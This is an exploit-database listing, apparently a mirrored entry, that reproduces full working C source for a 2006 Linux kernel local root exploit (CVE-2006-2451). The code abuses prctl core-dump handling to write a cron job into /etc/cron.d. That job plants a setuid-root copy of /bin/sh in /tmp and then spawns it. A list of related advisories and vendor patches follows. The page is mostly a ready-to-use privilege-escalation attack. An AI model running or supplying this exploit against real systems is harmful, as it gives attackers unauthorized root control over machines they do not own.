Lucene search
RootSSV:63702HistoryJul 01, 2014 - 12:00 a.m.
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit
2014-07-0100:00:00
Root
www.seebug.org
22
0.0004 Low
EPSS
Percentile
5.8%
No description provided by source.
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <[email protected]> (main PoC code) */
/* - RoMaNSoFt <[email protected]> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -i");
}
// milw0rm.com [2006-07-11]
Related
packetstorm
packetstorm
prctl.sh.txt
2006-07-14 00:00:00
seebug
seebug
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)
2014-07-01 00:00:00
Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)
2006-07-13 00:00:00
Linux Kernel 2.6.13 <= 2.6.17.4 - prctl() Local Root Exploit (logrotate)
2014-07-01 00:00:00
exploitpack
exploitpack
Linux Kernel 2.6.13 2.6.17.4 - sys_prctl() Local Privilege Escalation (1)
2006-07-11 00:00:00
Linux Kernel 2.6.13 2.6.17.4 - sys_prctl() Local Privilege Escalation (3)
2006-07-13 00:00:00
Linux Kernel 2.6.13 2.6.17.4 - logrotate prctl() Local Privilege Escalation
2006-07-18 00:00:00
redhat
redhat
(RHSA-2006:0574) kernel security update
2006-07-07 00:00:00
canvas
canvas
Immunity Canvas: DSU
2006-07-07 18:05:00
nessus
nessus
RHEL 4 : kernel (RHSA-2006:0574)
2006-07-10 00:00:00
CentOS 4 : kernel (CESA-2006:0574)
2006-07-13 00:00:00
SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 1896)
2007-12-13 00:00:00
prion
prion
Code injection
2006-07-07 18:05:00
ubuntucve
ubuntucve
CVE-2006-2451
2006-07-07 00:00:00
centos
centos
kernel security update
2006-07-08 02:51:34
securityvulns
securityvulns
[Full-disclosure] Re: rPSA-2006-0122-1 kernel
2006-07-12 00:00:00
[Full-disclosure] rPSA-2006-0122-1 kernel
2006-07-12 00:00:00
cve
cve
CVE-2006-2451
2006-07-07 18:05:00
exploitdb
exploitdb
suse
suse
local privilege escalation in kernel
2006-08-18 13:53:33
local privilege escalation in kernel
2006-08-11 14:25:01
local privilege escalation in kernel
2006-07-26 14:31:45
openvas
openvas
Ubuntu: Security Advisory (USN-311-1)
2022-08-26 00:00:00
SLES9: Security update for Linux kernel
2009-10-10 00:00:00
SLES9: Security update for Linux kernel
2009-10-10 00:00:00
ubuntu
ubuntu
Linux kernel vulnerabilities
2006-07-11 00:00:00